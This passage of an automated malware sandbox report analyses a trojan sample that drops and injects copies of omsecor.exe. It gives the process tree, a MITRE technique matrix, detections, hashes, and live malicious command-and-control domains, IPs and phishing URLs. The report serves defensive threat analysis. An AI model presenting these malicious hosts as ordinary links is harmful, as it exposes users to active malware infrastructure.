            Source: C:\Windows\SysWOW64\omsecor.exe | Code function: GetLocaleInfoA,13_2_00406E83
            Source: C:\Users\user\AppData\Roaming\omsecor.exe | Code function: GetLocaleInfoA,16_2_00406E83
            Source: C:\Windows\SysWOW64\omsecor.exe | Code function: GetLocaleInfoA,23_2_00406E83
            Source: C:\Users\user\AppData\Roaming\omsecor.exe | Code function: GetLocaleInfoA,26_2_00406E83
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe | Code function: 0_2_00403196 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00403196
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe | Code function: 2_2_00407499 GetLocalTime,GetLocalTime,GetLocalTime,GetTimeZoneInformation,SystemTimeToFileTime,SystemTimeToFileTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,2_2_00407499
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exe | Code function: 2_2_00406CB5 GetVersionExW,2_2_00406CB5
            Source: Amcache.hve.6.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.6.dr | Binary or memory string: msmpeng.exe
            Source: Amcache.hve.6.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: Amcache.hve.6.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
            Source: Amcache.hve.6.dr | Binary or memory string: MsMpEng.exe
            MITRE ATT&CK matrix, listed by tactic (the number in parentheses is the count shown in the matrix cell):

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
            Execution: Command and Scripting Interpreter (2); Native API (21); At; Cron; Launchd; Scheduled Task; Systemd Timers
            Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
            Privilege Escalation: Process Injection (112); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
            Defense Evasion: Masquerading (121); Virtualization/Sandbox Evasion (11); Process Injection (112); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (22); DLL Side-Loading (1)
            Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
            Discovery: System Time Discovery (2); Security Software Discovery (131); Virtualization/Sandbox Evasion (11); Process Discovery (1); File and Directory Discovery (1); System Information Discovery (23); Remote System Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
            Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
            Command and Control: Encrypted Channel (1); Ingress Tool Transfer (2); Non-Application Layer Protocol (2); Application Layer Protocol (12); Fallback Channels; Multiband Communication; Commonly Used Port
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
            Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Behavior Graph ID: 1569339  Sample: fmlgbgc2p5.exe  Startdate: 05/12/2024  Architecture: WINDOWS  Score: 100

Start node
    DNS/IP info: ow5dirasuek.com, mkkuei4kdsz.com, lousta.net
    Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for URL or domain; 5 other signatures

Process tree (recovered from the flattened graph):

fmlgbgc2p5.exe (started)
    Signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Found API chain indicative of debugger detection; Injects a PE file into a foreign processes
    fmlgbgc2p5.exe (started)
        Dropped: C:\Users\user\AppData\Roaming\omsecor.exe (MS-DOS)
        omsecor.exe (started)
            Signatures: Antivirus detection for dropped file; Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); 3 other signatures
            omsecor.exe (started)
                Network: mkkuei4kdsz.com 15.197.204.56 (49827, 49951, 80) TANDEMUS, United States; lousta.net 193.166.255.171 (49708, 49771, 49844) FUNETASFI, Finland; ow5dirasuek.com 52.34.198.229 (49833, 49955, 80) AMAZON-02US, United States
                Dropped: C:\Windows\SysWOW64\omsecor.exe (MS-DOS)
                omsecor.exe (started)
                    Signatures: Antivirus detection for dropped file; Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); 3 other signatures
                    omsecor.exe (started)
                        omsecor.exe (started)
                            Signatures: Injects a PE file into a foreign processes
                            omsecor.exe (started)
                                omsecor.exe (started)
                                    Signatures: Drops executables to the windows directory (C:\Windows) and starts them; Injects a PE file into a foreign processes
                                    omsecor.exe (started)
                            WerFault.exe (started)
                    WerFault.exe (started)
            WerFault.exe (started)
    WerFault.exe (started)
        Dropped: C:\ProgramData\Microsoft\...\Report.wer (Unicode)

Source | Detection | Scanner | Label | Link
fmlgbgc2p5.exe | 89% | ReversingLabs | Win32.Trojan.VirtuMonde |
fmlgbgc2p5.exe | 100% | Avira | HEUR/AGEN.1352667 |
fmlgbgc2p5.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Windows\SysWOW64\omsecor.exe | 100% | Avira | HEUR/AGEN.1352667 |
C:\Users\user\AppData\Roaming\omsecor.exe | 100% | Avira | HEUR/AGEN.1352667 |
C:\Windows\SysWOW64\omsecor.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\omsecor.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches
            No Antivirus matches
Source | Detection | Scanner | Label | Link
http://mkkuei4kdsz.com/ | 100% | Avira URL Cloud | phishing |
http://mkkuei4kdsz.com/441/819.html | 100% | Avira URL Cloud | phishing |
http://lousta.net/349/212.html | 100% | Avira URL Cloud | phishing |
http://lousta.net/ | 100% | Avira URL Cloud | phishing |
http://lousta.net/952/351.htmlU? | 100% | Avira URL Cloud | phishing |
http://lousta.net/952/351.html_ | 100% | Avira URL Cloud | phishing |
http://lousta.net/370/988.html | 100% | Avira URL Cloud | phishing |
http://lousta.net/952/351.htmlf? | 100% | Avira URL Cloud | phishing |
http://lousta.net/349/212.htmlD | 100% | Avira URL Cloud | phishing |
http://lousta.net/952/351.htmlx?3 | 100% | Avira URL Cloud | phishing |
http://lousta.net/952/351.htmlshqos.dll.mui= | 100% | Avira URL Cloud | phishing |
http://ow5dirasuek.com/612/675.htmlc | 100% | Avira URL Cloud | phishing |
http://lousta.net/400/589.html | 100% | Avira URL Cloud | phishing |
http://ow5dirasuek.com/612/675.html | 100% | Avira URL Cloud | phishing |
http://mkkuei4kdsz.com/8 | 100% | Avira URL Cloud | phishing |
http://ow5dirasuek.com/612/675.html% | 100% | Avira URL Cloud | phishing |
http://lousta.net/400/589.htmlx | 100% | Avira URL Cloud | phishing |
http://lousta.net/rontdesk | 100% | Avira URL Cloud | phishing |
http://lousta.net/206/582.html | 100% | Avira URL Cloud | phishing |
http://ow5dirasuek.com/358/336.html | 100% | Avira URL Cloud | phishing |
http://ow5dirasuek.com/~ | 100% | Avira URL Cloud | phishing |
http://lousta.net/952/351.html6 | 100% | Avira URL Cloud | phishing |
http://lousta.net/349/212.html5T | 100% | Avira URL Cloud | phishing |
http://lousta.net/952/351.htmlA | 100% | Avira URL Cloud | phishing |
http://lousta.net/952/351.html | 100% | Avira URL Cloud | phishing |
http://mkkuei4kdsz.com/931/166.html | 100% | Avira URL Cloud | phishing |
http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodcon | 100% | Avira URL Cloud | phishing |
http://ow5dirasuek.com/612/675.html-8a8d424fbe43573ef1LMEM | 100% | Avira URL Cloud | phishing |
http://lousta.net/370/988.html= | 100% | Avira URL Cloud | phishing |
http://lousta.net/206/582.htmlO2 | 100% | Avira URL Cloud | phishing |
http://lousta.net/0 | 100% | Avira URL Cloud | phishing |
http://lousta.net/349/212.html.T | 100% | Avira URL Cloud | phishing |
http://lousta.net/952/351.html) | 100% | Avira URL Cloud | phishing |
http://lousta.net/861/856.html | 100% | Avira URL Cloud | phishing |
http://ow5dirasuek.com/ | 100% | Avira URL Cloud | phishing |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
lousta.net | 193.166.255.171 | true | true | | unknown
mkkuei4kdsz.com | 15.197.204.56 | true | true | | unknown
ow5dirasuek.com | 52.34.198.229 | true | true | | unknown
s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
193.166.255.171 | lousta.net | Finland | 1741 | FUNETASFI | true
52.34.198.229 | ow5dirasuek.com | United States | 16509 | AMAZON-02US | true
15.197.204.56 | mkkuei4kdsz.com | United States | 7430 | TANDEMUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1569339
Start date and time: 2024-12-05 18:08:14 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 11s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 32
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: fmlgbgc2p5.exe (renamed because the original name is a hash value)
Original Sample Name: 8b0613982b6a7f0542a7dbfce43aa216a043ce9a2a2a24a7a2c77a6e8fa6aa72.exe
Detection: MAL
Classification: mal100.bank.troj.evad.winEXE@29/27@3/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 104
• Number of non-executed functions: 410
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 13.89.179.12, 52.168.117.172
• Excluded domains from analysis (whitelisted): onedsblobprdeus07.eastus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, time.windows.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: fmlgbgc2p5.exe
Time | Type | Description
12:09:41 | API Interceptor | 9x Sleep call for process: omsecor.exe modified
12:09:48 | API Interceptor | 6x Sleep call for process: WerFault.exe modified
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        193.166.255.171cOviNFmw21.exeGet hashmaliciousNeconydBrowse
                        • lousta.net/352/26.html
                        nNX5KYQRhg.exeGet hashmaliciousNeconydBrowse
                        • lousta.net/691/461.html
                        bd0wJGTae5.exeGet hashmaliciousNeconydBrowse
                        • lousta.net/562/252.html
                        HUo09bfA3g.exeGet hashmaliciousNeconydBrowse
                        • lousta.net/989/145.html
                        Update-KB4890-x86.exeGet hashmaliciousUnknownBrowse
                        • www4.cedesunjerinkas.com/chr/wtb/lt.exe
                        Update-KB4890-x86.exeGet hashmaliciousUnknownBrowse
                        • www4.cedesunjerinkas.com/chr/wtb/lt.exe
                        document.log.scr.exeGet hashmaliciousUnknownBrowse
                        • www4.cedesunjerinkas.com/chr/wtb/lt.exe
                        yGktPvplJn.exeGet hashmaliciousPushdoBrowse
                        • www.synetik.net/
                        cnzWgjUhS2.exeGet hashmaliciousNeconydBrowse
                        • lousta.net/161/343.html
                        Z0rY97IU6r.exeGet hashmaliciousNeconydBrowse
                        • lousta.net/372/625.html
                        52.34.198.229cOviNFmw21.exeGet hashmaliciousNeconydBrowse
                        • ow5dirasuek.com/618/507.html
                        8dPlV2lT8o.exeGet hashmaliciousSimda StealerBrowse
                        • lygyvuj.com/login.php
                        7ObLFE2iMK.exeGet hashmaliciousSimda StealerBrowse
                        • lygyvuj.com/login.php
                        UMwpXhA46R.exeGet hashmaliciousSimda StealerBrowse
                        • lygyvuj.com/login.php
                        1fWgBXPgiT.exeGet hashmaliciousSimda StealerBrowse
                        • lygyvuj.com/login.php
                        arxtPs1STE.exeGet hashmaliciousSimda StealerBrowse
                        • lygyvuj.com/login.php
                        Z8eHwAvqAh.exeGet hashmaliciousSimda StealerBrowse
                        • lygyvuj.com/login.php
                        WlCVLbzNph.exeGet hashmaliciousSimda StealerBrowse
                        • lygyvuj.com/login.php
                        Bpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                        • lygyvuj.com/login.php
                        uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                        • lygyvuj.com/login.php
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        ow5dirasuek.comcOviNFmw21.exeGet hashmaliciousNeconydBrowse
                        • 52.34.198.229
                        nNX5KYQRhg.exeGet hashmaliciousNeconydBrowse
                        • 52.34.198.229
                        bd0wJGTae5.exeGet hashmaliciousNeconydBrowse
                        • 52.34.198.229
                        HUo09bfA3g.exeGet hashmaliciousNeconydBrowse
                        • 52.34.198.229
                        cnzWgjUhS2.exeGet hashmaliciousNeconydBrowse
                        • 52.34.198.229
                        Z0rY97IU6r.exeGet hashmaliciousNeconydBrowse
                        • 52.34.198.229
                        2VJZxIY76V.exeGet hashmaliciousNeconydBrowse
                        • 52.34.198.229
                        qIIGdGOTWO.exeGet hashmaliciousNeconydBrowse
                        • 52.34.198.229
                        O0prB0zCWi.exeGet hashmaliciousNeconydBrowse
                        • 52.34.198.229
                        djvu452.exeGet hashmaliciousNeconydBrowse
                        • 52.34.198.229
                        mkkuei4kdsz.comcOviNFmw21.exeGet hashmaliciousNeconydBrowse
                        • 15.197.204.56
                        nNX5KYQRhg.exeGet hashmaliciousNeconydBrowse
                        • 15.197.204.56
                        bd0wJGTae5.exeGet hashmaliciousNeconydBrowse
                        • 15.197.204.56
                        HUo09bfA3g.exeGet hashmaliciousNeconydBrowse
                        • 15.197.204.56
                        cnzWgjUhS2.exeGet hashmaliciousNeconydBrowse
                        • 64.225.91.73
                        Z0rY97IU6r.exeGet hashmaliciousNeconydBrowse
                        • 64.225.91.73
                        2VJZxIY76V.exeGet hashmaliciousNeconydBrowse
                        • 64.225.91.73
                        qIIGdGOTWO.exeGet hashmaliciousNeconydBrowse
                        • 64.225.91.73
                        O0prB0zCWi.exeGet hashmaliciousNeconydBrowse
                        • 64.225.91.73
                        djvu452.exeGet hashmaliciousNeconydBrowse
                        • 64.225.91.73
                        lousta.netcOviNFmw21.exeGet hashmaliciousNeconydBrowse
                        • 193.166.255.171
                        nNX5KYQRhg.exeGet hashmaliciousNeconydBrowse
                        • 193.166.255.171
                        bd0wJGTae5.exeGet hashmaliciousNeconydBrowse
                        • 193.166.255.171
                        HUo09bfA3g.exeGet hashmaliciousNeconydBrowse
                        • 193.166.255.171
                        cnzWgjUhS2.exeGet hashmaliciousNeconydBrowse
                        • 193.166.255.171
                        Z0rY97IU6r.exeGet hashmaliciousNeconydBrowse
                        • 193.166.255.171
                        2VJZxIY76V.exeGet hashmaliciousNeconydBrowse
                        • 193.166.255.171
                        qIIGdGOTWO.exeGet hashmaliciousNeconydBrowse
                        • 193.166.255.171
                        O0prB0zCWi.exeGet hashmaliciousNeconydBrowse
                        • 193.166.255.171
                        djvu452.exeGet hashmaliciousNeconydBrowse
                        • 193.166.255.171
                        s-part-0035.t-0009.t-msedge.netQiGA4zxp7h.exeGet hashmaliciousFormBookBrowse
                        • 13.107.246.63
                        f5TWdT5EAc.exeGet hashmaliciousPhorpiex, RHADAMANTHYS, XmrigBrowse
                        • 13.107.246.63
                        lj8shy7Er0.exeGet hashmaliciousGuLoaderBrowse
                        • 13.107.246.63
                        BUE1EnkN5v.exeGet hashmaliciousGuLoaderBrowse
                        • 13.107.246.63
                        http://web-quorvyn.azurewebsites.netGet hashmaliciousTechSupportScamBrowse
                        • 13.107.246.63
                        8JuGuaUaZP.exeGet hashmaliciousAgentTeslaBrowse
                        • 13.107.246.63
                        https://vacilandoblog.wordpress.com/2015/04/22/a-tribute-to-my-mother-in-law-rest-in-peace-april-22-2015/Get hashmaliciousUnknownBrowse
                        • 13.107.246.63
                        MOV-0903787857-(Jmulvey)MMS0%3A28.mp4.htmlGet hashmaliciousHTMLPhisherBrowse
                        • 13.107.246.63
                        http://womenluxuryfashion.comGet hashmaliciousTechSupportScamBrowse
                        • 13.107.246.63
                        O7T6gwPvqA.exeGet hashmaliciousScreenConnect ToolBrowse
                        • 13.107.246.63
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        FUNETASFIcOviNFmw21.exeGet hashmaliciousNeconydBrowse
                        • 193.166.255.171
                        armv6l.elfGet hashmaliciousGafgyt, MiraiBrowse
                        • 130.234.121.110
                        sora.ppc.elfGet hashmaliciousMiraiBrowse
                        • 86.50.103.12
                        ppc.elfGet hashmaliciousMiraiBrowse
                        • 153.1.142.240
                        loligang.mpsl-20241128-1536.elfGet hashmaliciousMiraiBrowse
                        • 192.98.111.96
                        x86.elfGet hashmaliciousMirai, MoobotBrowse
                        • 153.1.142.236
                        arm7.elfGet hashmaliciousUnknownBrowse
                        • 128.215.188.75
                        la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                        • 153.1.77.176
                        x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                        • 128.214.247.115
                        x86.elfGet hashmaliciousUnknownBrowse
                        • 86.50.90.19
                        AMAZON-02USspc.elfGet hashmaliciousUnknownBrowse
                        • 54.171.230.55
                        cOviNFmw21.exeGet hashmaliciousNeconydBrowse
                        • 52.34.198.229
                        https://ln5.sync.com/dl/3c61e3b30#gum48d7j-5vgyh9gy-tcjv9rp4-ffxvqp5fGet hashmaliciousUnknownBrowse
                        • 15.222.106.233
                        https://tippfloorcovering-my.sharepoint.com/:f:/g/personal/inderjeet_tippfloor_com/EpEIzIGDzrlMs2z8rWgki5MBO5-d64iEaOqqeF3ulFqTiw?e=T39wglGet hashmaliciousUnknownBrowse
                        • 108.158.75.11
                        http://kitces.emlnk1.comGet hashmaliciousUnknownBrowse
                        • 13.227.9.168
                        https://vacilandoblog.wordpress.com/2015/04/22/a-tribute-to-my-mother-in-law-rest-in-peace-april-22-2015/Get hashmaliciousUnknownBrowse
                        • 13.250.84.149
                        No context
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.7045948762016093
                        Encrypted:false
                        SSDEEP:96:l2FYJC3Wssh3zxTMb91QXIDcQvc6QcEVcw3cE/9mS+HbHg/8BRTf3Oy1FhZAX/dD:gSJC3WFF0BU/4ju1zuiFCZ24IO81
                        MD5:D79ECD861FB598613DAE97C6B110DE00
                        SHA1:978BDE9B3EF1681A39742804094083EBECCF04D6
                        SHA-256:9D56EE817A5F5FAF8491B71DE2D4846D7D72A84F840B6951DEC71355EFF66D28
                        SHA-512:475B6F31343EA942F564BC06AF69E7EE184D30CAB508CF0A5DF06874714FF1E01748E2FD3426E44EE40EE0A2F6C44E74A4B46B9C7D51377DFA870E2224D3FADE
                        Malicious:true
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.7039509512860884
                        Encrypted:false
                        SSDEEP:96:WlFwOW8Gm0tsXhJozxTMb91QXIDcQvc6QcEVcw3cE/99n+HbHg/8BRTf3Oy1FhZ7:a6n8Grt8SF0BU/Aju1zuiFCZ24IO8I
                        MD5:F466FE17C450EB2CEB242C7F0E502104
                        SHA1:E55613BFF93FAC361CA84BFE9215C24A92A6BF8F
                        SHA-256:D336648306D6A126D713F1DF29416521AE8B0DE8067361BA84AA7B7224C8812D
                        SHA-512:88488B09AC8C9DA048724D9DE45D33F84E3528C84560319F150158E1D9CD2CC7A6F38A44129977162D1A243E8519793C83EA55A0FAAEC253143F1921CC58A7B2
                        Malicious:false
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.6974801132539817
                        Encrypted:false
                        SSDEEP:96:4iFdWXhTxARsXhBszxTMb91QXIDcQvc6QcEVcw3cE/O0t+HbHg/8BRTf3Oy1FhZy:j/WXDARkmF0BU/Yju1zuiFCZ24IO8J
                        MD5:794DB18AA911CB3651F0668B30E4DBFC
                        SHA1:4B30FDB350E4D0DF0301F98F47E9DAC02FE205B1
                        SHA-256:6ED79B979EAA0AD4E5AE6BE5B1D1C7A9A4724B6FF2BB9DFF8038968707FD49E1
                        SHA-512:545C4CBDC6D14450DC48DE9DE1208A58821D1B1FE3C36429297AC6B0BCA7BA813F8051B6DB6A62CFF61B67E6D37106FC448200FC43337195EB089A42EA91F7E7
                        Malicious:false
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.6968864431654846
                        Encrypted:false
                        SSDEEP:96:zBFbAmJNosXhGzxTMb91QXIDcQvc6QcEVcw3cE/99n+HbHgnoW6HeOyushZAX/dP:dpA2NoHF0BU/AjzXzuiFdZ24IO8I
                        MD5:2CAD7526A31F60851553C8B796444D15
                        SHA1:1C5BFA1D523DF1270E7276847C787AAF5264E19C
                        SHA-256:64A6C2098862DCDA171001F7235F0B1A27834F84F51853C7DD21CF2725E32745
                        SHA-512:45DC4F796673CF65F0ACB56ED5B39124804E29683D176ED6FAD426A555D78C95B40F9DC2CFA64F4F6FE36FEDE6F46BB3BD3EAC30E3F830678162883066B6D515
                        Malicious:false
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.6968846418239283
                        Encrypted:false
                        SSDEEP:96:NeFzSqrm6zsXhNzxTMb91QXIDcQvc6QcEVcw3cE/99n+HbHgnoW6HeOyushZAX/k:QJfr1zqF0BU/AjzXzuiFCZ24IO8I
                        MD5:579A106F2064137F0D9E72855C1A15FE
                        SHA1:05AF4DEA8A48C65BA9B2F8E243A4BCD37899DA99
                        SHA-256:D319865F8AFC535E2AD66CB3912BD91D4428B1DE0B11A7C1BC9704C183FBCF06
                        SHA-512:67FB8D3A59C90E5A011D58D1E64DA55BC1172A74026EE2C0F5EE743D28E13AEDCA83BF81488800E08066FCE22EBFECD5659EDC8F3270B7ACE9FD6A88D4A1AF96
                        Malicious:false
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.6904105207040816
                        Encrypted:false
                        SSDEEP:192:9IGPj3eKOEsF0BU/YjzXzuiFdZ24IO8J:hj3eKOEsmBU/YjDzuiFdY4IO8J
                        MD5:663C52A7377C25B15A14090340B2BC47
                        SHA1:2A36B45F9E9B5DE9851B7C31F0D9B609EB3E49EC
                        SHA-256:1D9473ECFB9C4F9E25357344348850C1D913BB122E60F893CF35056121C90A6D
                        SHA-512:1C6E01EA6FC169AEA70BF278D110AFBC00F589EE174DAEDBE9397F6388A14EE7071D3C139E89FD660203DC80E62C0274B9701FCA6553AF4E3755C5B67D9D65B0
                        Malicious:false
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Mini DuMP crash report, 14 streams, Thu Dec 5 17:10:09 2024, 0x1205a4 type
                        Category:dropped
                        Size (bytes):34114
                        Entropy (8bit):2.0098473980093425
                        Encrypted:false
                        SSDEEP:192:5WuRKjE/UOfxvWNey9ScvqW/2auClcTi:scfxyeOvXzuW
                        MD5:E74E04D593962EE3EFCCCFB4CB405C29
                        SHA1:6CE143883E611418639323C312A10D314BF1D74E
                        SHA-256:1242E54CF39F034F7575071F8D062F0C4801136BBE8EBE8F513A072F6B84D3C1
                        SHA-512:74D9779DD5FE37AD8E06B20D58AEC8FCF96798BEE3C1270FC9A2CA36E02765DFA7D3B7DD5CEBA9398DE974BB928B2FAF7823C4667D57B3AF6AA8574505216C89
                        Malicious:false
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):6280
                        Entropy (8bit):3.71719075814616
                        Encrypted:false
                        SSDEEP:192:R6l7wVeJus64NYEw4u6pr089bWNsfcWLym:R6lXJV6qYEw4uOWGfHf
                        MD5:C99D414FD806DF84B89ABFF8F86DFE96
                        SHA1:05497A8399E6533BB5C3E207CD9861523BC39973
                        SHA-256:84E1D8B93D115B2B8BDC0D54DD4F904F4881BD3B33E34B328586AFFEF2F1F7E0
                        SHA-512:F27D847EF0E17ED70E4AE6033B97E441D17574A79F1999EA8C9B7CFC9A370DBEB9523B30BB453C0018AB77C08DB523FFEE5E3F6892AEAAF484914329A402BAF3
                        Malicious:false
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4648
                        Entropy (8bit):4.465554044932767
                        Encrypted:false
                        SSDEEP:48:cvIwWl8zsZkJg77aI9ZuWpW8VYvYm8M4J+maqF8PW+q8Tag/sTy2p8d:uIjfUI7PP7V/J+rJuiaysTXp8d
                        MD5:80F6DB076DF7B0C03B91F0868FEF2E4E
                        SHA1:280AB9F45B77F7FE1E4BE61A1516C59F79261598
                        SHA-256:B24903C2D5DC5CF0C8EC68990C5A4C7DBF12D8D46EB42ADE3D6B980194FAAC50
                        SHA-512:FAB07A2113B7289F73C1224733739C6F071682EBFCBD06DE56618E50DBA111CE00D69E325C4244BC593DBDF2358AB366F5E9A955DB71EF213FB01E36BB175CC6
                        Malicious:false
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Mini DuMP crash report, 14 streams, Thu Dec 5 17:10:09 2024, 0x1205a4 type
                        Category:dropped
                        Size (bytes):33646
                        Entropy (8bit):2.013418893985959
                        Encrypted:false
                        SSDEEP:96:5Q8s0SU+TTMHCUdE5tUi7D331MQGzDXaeWdKcMC7oQPdyMr4rpWIkWIl/I45IUHD:5iCCHUO5GzDqehSRyMso5IUHEkn/
                        MD5:4BD1A3EC04BA3B9F6C57EFACBD3C5591
                        SHA1:6DDDE6536C5953CF2005246620DA1401B97E752C
                        SHA-256:EFA61C707CE0465CD9AA7FE9AAC3AA12FAD7B4929CC76DF36CFB100A36ADBEE2
                        SHA-512:D1514AAA6B8F802DAA30144C7F39B7F0A643E9FD2E6A5A24106F31131B60018EAADD983FB8D28FD5EA29E43C5E2EED162B08F72DB271F34916302650578FD298
                        Malicious:false
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):8240
                        Entropy (8bit):3.6918612188599638
                        Encrypted:false
                        SSDEEP:192:R6l7wVeJb26DL6Yrl6jkgmf04u6prZ89bWdsfxym:R6lXJq6DL6Yp6ggmf04u5WWfl
                        MD5:4D44223635938380AE14BA7F471714A6
                        SHA1:07AADF9CD3AA1B47DD165F2E1F6B67F9F1A67DBF
                        SHA-256:627DD871B94AC63AE4C387E552D3643BF94D595D73AE22103358C67F4BE078AF
                        SHA-512:C546968491B947EA46F44D6B1104AE5853011C10AE2EB89F9DFA7D4F943B70AB27561A1284B6168D0FDECBEAFE01A3BF22BEA2D950A6EDAAB5B6B6676EF1F59A
                        Malicious:false
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4648
                        Entropy (8bit):4.46871130383936
                        Encrypted:false
                        SSDEEP:48:cvIwWl8zsZkJg77aI9ZuWpW8VYtYm8M4JqaqF18x+q85gXT7Vld:uIjfUI7PP7VtJfaaqKT7Vld
                        MD5:4EE572B4D721952EEC18CA97D69C229D
                        SHA1:DFC8EE3E3709F321CA731F1FBE0DB08735848400
                        SHA-256:72626D641F8FAFC94D21201665F450EF2CAB04C9144D9E8ECDB88D90EE98BE33
                        SHA-512:F859F0502DD7800E485E2C9F6DD4F3A6D82F2009679CC9FC16DA7DF54186DEEA2E0A45B4829D35D6E016642636B7B4046356542B8DBE9CC43A394F5758B4BC86
                        Malicious:false
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Mini DuMP crash report, 14 streams, Thu Dec 5 17:09:16 2024, 0x1205a4 type
                        Category:dropped
                        Size (bytes):34068
                        Entropy (8bit):2.0064273589642734
                        Encrypted:false
